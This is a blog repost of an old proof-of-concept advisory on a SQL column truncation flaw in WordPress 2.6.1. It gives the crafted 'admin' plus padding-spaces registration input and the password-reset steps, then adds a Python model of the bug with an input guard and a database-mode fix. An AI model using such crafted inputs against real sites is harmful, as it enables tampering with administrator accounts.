WordPress 2.6.1 SQL Column Truncation Vulnerability Analysis dongfang - 超凡娱乐


2019-02-12 10:02:01 | Author: 凌青 | Tags: testing, start, user registration | Views: 3486

WordPress users should take note, though testing this against my site is pointless: I have had user registration turned off from the start.

# WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)
#
# found by irk4z[at]yahoo.pl
# homepage: https://irk4z.wordpress.com/
#
# this is not critical vuln [;
#
# first, read this discovery:
# https://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/
#
# in this hack we can remote change admin password, if registration enabled
#
# greets: Stefan Esser, Lukasz Pilorz, cOndemned, tbh, sid.psycho, str0ke and all fiends

1. go to url: server.com/wp-login.php?action=register

2. register as:

login: admin x
email: your email

^ admin[55 space chars]x

now, we have duplicated admin account in database

3. go to url: server.com/wp-login.php?action=lostpassword

4. write your email into field and submit this form

5. check your email and go to reset confirmation link

6. admin's password changed, but new password will be sent to correct admin email ;/

# milw0rm.com
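The truncation behaviour the advisory relies on, modelled in Python as an added example (not part of the original advisory and not WordPress code), next to an input guard that rejects the over-long login before it reaches the database. The 60-character column width is an assumption inferred from the "admin[55 space chars]x" input, and every function name is hypothetical.

```python
import re

COLUMN_WIDTH = 60  # assumption: "admin" + 55 spaces + "x" is 61 chars, one past the column

def mysql_equal(a: str, b: str) -> bool:
    """String comparison under a PAD SPACE collation: trailing spaces are ignored."""
    return a.rstrip(" ") == b.rstrip(" ")

def nonstrict_store(value: str, width: int = COLUMN_WIDTH) -> str:
    """Non-strict sql_mode: an over-long value is silently cut to the column width."""
    return value[:width]

def naive_register(table: list, login: str) -> bool:
    """Uniqueness is checked on the untruncated input, then the value is stored."""
    if any(mysql_equal(row, login) for row in table):
        return False  # name already taken
    table.append(nonstrict_store(login))
    return True

def lookup(table: list, login: str) -> list:
    """Rows that an equality match on the login column would return."""
    return [row for row in table if mysql_equal(row, login)]

def validate_login(login: str, width: int = COLUMN_WIDTH) -> str:
    """Guard: refuse anything the column cannot hold or with non-canonical whitespace."""
    normalized = re.sub(r"\s+", " ", login).strip()
    if len(login) > width or normalized != login:
        raise ValueError("login rejected: over-long or non-canonical whitespace")
    return login

def guarded_register(table: list, login: str) -> bool:
    """Same registration path, but the input is validated before any query runs."""
    return naive_register(table, validate_login(login))

def demo() -> tuple:
    crafted = "admin" + " " * 55 + "x"   # constructed input, 61 characters
    table = ["admin"]                    # constructed table: one existing account
    accepted = naive_register(table, crafted)
    dupes = len(lookup(table, "admin"))  # both rows now compare equal to "admin"
    safe_table = ["admin"]
    try:
        guarded_register(safe_table, crafted)
        blocked = False
    except ValueError:
        blocked = True
    return accepted, dupes, blocked, len(safe_table)
```

At the database layer, a strict sql_mode (STRICT_ALL_TABLES or STRICT_TRANS_TABLES) turns the silent truncation modelled by nonstrict_store() into an error, so the insert fails instead of creating the second row.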